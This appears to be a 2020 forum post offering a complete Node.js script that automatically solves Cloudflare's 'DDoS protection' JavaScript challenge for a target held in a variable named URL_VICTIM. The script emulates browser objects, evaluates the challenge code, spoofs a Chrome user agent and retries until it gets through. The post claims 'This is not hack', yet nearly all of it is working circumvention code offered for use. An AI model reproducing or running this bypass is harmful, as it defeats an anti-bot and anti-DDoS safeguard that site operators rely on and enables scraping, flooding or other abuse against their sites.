[06/2020] Bypass "ddos protection by cloudflare" with nodejs without puppeteer

This is not hack
This is just the solution to the challenge
File to save cookie "aa.json"
Main require: "request, cheerio,safe-eval, tough-cookie-filestore"
Variable URL_VICTIM : by yourself
File: bypass.js:
//
var request_module = require('request');
var cheerio = require('cheerio');
var qs = require('querystring');
var safeEval = require('safe-eval');
var FileCookieStore = require('tough-cookie-filestore');
const browserMe = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36';
var URL_VICTIM= '###by_yourself###';
const file_name_1= __dirname+ '/aa.json';
if(!require('fs').existsSync(file_name_1)) require('fs').writeFileSync(file_name_1, '');
var request = request_module.defaults({
 jar : request_module.jar(new FileCookieStore(file_name_1))
});

var rq= {
 request,
 try: 0,
 calcTime: -1,
 browserMe
}

var arrFetchMe= [];
function fetchMe(url, method, data){
 console.log('url:', url);
 arrFetchMe.push({
  url,
  method: method,
  data
 });
}

function processHTML(html, callback){
 var $ = cheerio.load(html);

 var bgImg= URL_VICTIM+ $('#trk_jschal_nojs').attr('style').split('\'')[1];
 // console.log({bgImg});
 fetchMe(bgImg);
 var temp = '(function(){})();'+ $('script').last().html();
 
 var objDivId= {
  //
 }
 var document = {
  getElementsByTagName: function(tag1){
    return [
      {
        appendChild: function(obj){
          fetchMe(obj.src);
        }
      }
    ]
  },
  getElementById: function(id){
   if(objDivId[id]) return objDivId[id];
   var jquery= $('#'+ id);
   var a= {
    value: jquery.attr('value'),
    action: jquery.attr('action') ? URL_VICTIM+ jquery.attr('action'): undefined,
    submit: function(){
     // console.log(objDivId);
     // console.log('url', this.action);
     var a= {};
     $('#'+ id+ ' input').each(function(){
      var b= $(this).attr('id');
      a[$(this).attr('name')]= (objDivId[b] || {}).value || $(this).attr('value');
     })
     fetchMe(this.action, 'POST', a);
    },
    style: {},
    jquery,
    innerHTML: jquery.html()
   };
   objDivId[id]= a;
   return objDivId[id];
  },
  body: {
   appendChild: function(objEl){
    // console.log(objEl);
    // request to objEl.obj.src
    if(objEl && objEl.obj && objEl.obj.src) fetchMe(objEl.obj.src);
   }
  },
  attachEvent: function(flag, fn){
   fn();
  },
  createElement: function(){
   return {
    innerHTML: '',
    firstChild: {
     href: URL_VICTIM+ '/'
    },
    obj: {},
    setAttribute: function(tag, val){
     this.obj[tag]= tag=='src' ? (
      URL_VICTIM+ val
     ) : val;
    }
   }
  },
  addEventListener: function(flag, fn, trueFalse) {
   fn();
  }
 };
 var navigator = {
  cookieEnabled: true,
  userAgent: browserMe
 }
 var context = {
  document: document,
  location: {hash: ''},
  window : {
   'addEventListener' : 1,
   navigator
  },
  navigator,
  setTimeout: function(fn, ms){
   // setTimeout(fn, ms);
   fn();
  },
  setInterval: function(){
   return 1+ Math.floor(Math.random()*10);
  }
 };
 try{
  safeEval(temp, context);
 }
 catch(_ex){
  return callback(_ex);
 }
 // console.log(arrFetchMe);
 request({
  url: arrFetchMe[0].url,
  headers: {
   'Referer': URL_VICTIM+ '/',
   'User-Agent': browserMe
  }
 }, function(_er0, _res0){
  //
 });
 request({
  url: arrFetchMe[1].url,
  headers: {
   'Referer': URL_VICTIM+ '/',
   'User-Agent': browserMe
  }
 }, function(_er0, _res0){
  //
 });
 var meLen= arrFetchMe.length -1;
 if(arrFetchMe[meLen] && arrFetchMe[meLen].data){
  var x= arrFetchMe[meLen], dataString= '', start0= 0;
  Object.keys(x.data).forEach(function(el){
   var a= x.data[el];
   if(!start0){
    start0= 1;
   } else dataString+= '&';
   dataString+= ''+ el+ '='+ x.data[el];
  });
  console.log({dataString});
  var opt2 = {
   url: x.url,
   headers: {
    'Referer': URL_VICTIM+ '/',
    'User-Agent': browserMe,
    'Content-Type': 'application/x-www-form-urlencoded',
   },
   method: 'POST',
   body: dataString
  };
  callback(null, opt2);
 } else {
  callback({message: 'html ddos cloudflare change?'});
 }
};


function poolWeb(html, timeOut, callbackDone){
 processHTML(html, function(err, opt2){
  function callNext(){
   var timeOut_calc= Math.max(20, timeOut+ 1000);
   mainAction(timeOut_calc, callbackDone);
  }
  if(err){
   console.log(err.message);
   callNext();
   return;
  }
  setTimeout(function(){
   var fileName = file_name_1;
   function callbackRequest(err2, res2, html2) {
    if(err2) return callNext();
    var x = res2.statusCode;
    if(x==403){
     // require('fs').writeFileSync('./g-capcha.html', html2);
     console.log('g-recapcha');
     if(rq.try%5 == 4) require('fs').writeFileSync(fileName, '');
     rq.try++;
     callNext();
    }
    else if(x==503){
     console.log('why enable javascript...');
     if(rq.try%5 == 4) require('fs').writeFileSync(fileName, '');
     callNext();
    }
    else if(x==200){
     console.log('oke 1');
     rq.try= 0;
     rq.ok= true; if(callbackDone) callbackDone(0);
    } else callNext();
   }
   request(opt2, callbackRequest);
  }, timeOut);
 })
}

function mainAction(timeOut, callbackDone){
 var options = {
  url: URL_VICTIM+ '/',
  timeout: 5000,
  headers: {
   'User-Agent': browserMe
  }
 };
 request(options , function (error, response, html) {
  if (!error && response.statusCode == 200) {
   console.log('oke 0');
   //require('fs').writeFileSync('./app2.html', html);
   rq.ok= true;
   rq.try= 0;
   if(callbackDone) callbackDone(0);
  }
  else if(error) console.error(error);
  else{
   var x = response.statusCode;
   console.log({
    "note": 'fail 1st',
    "resCode": response.statusCode
   })
   if(x==503) poolWeb(html, timeOut, callbackDone);
  }
 });
}

// mainAction(9000);

rq.mainAction= mainAction;
module.exports= rq;

//
USE:
//
const rq= require('./bypass.js');
var request;
if(!rq.ok) {
  rq.mainAction(9000, function(_done){
    request= rq.request;
  });
}
else request= rq.request;

Comments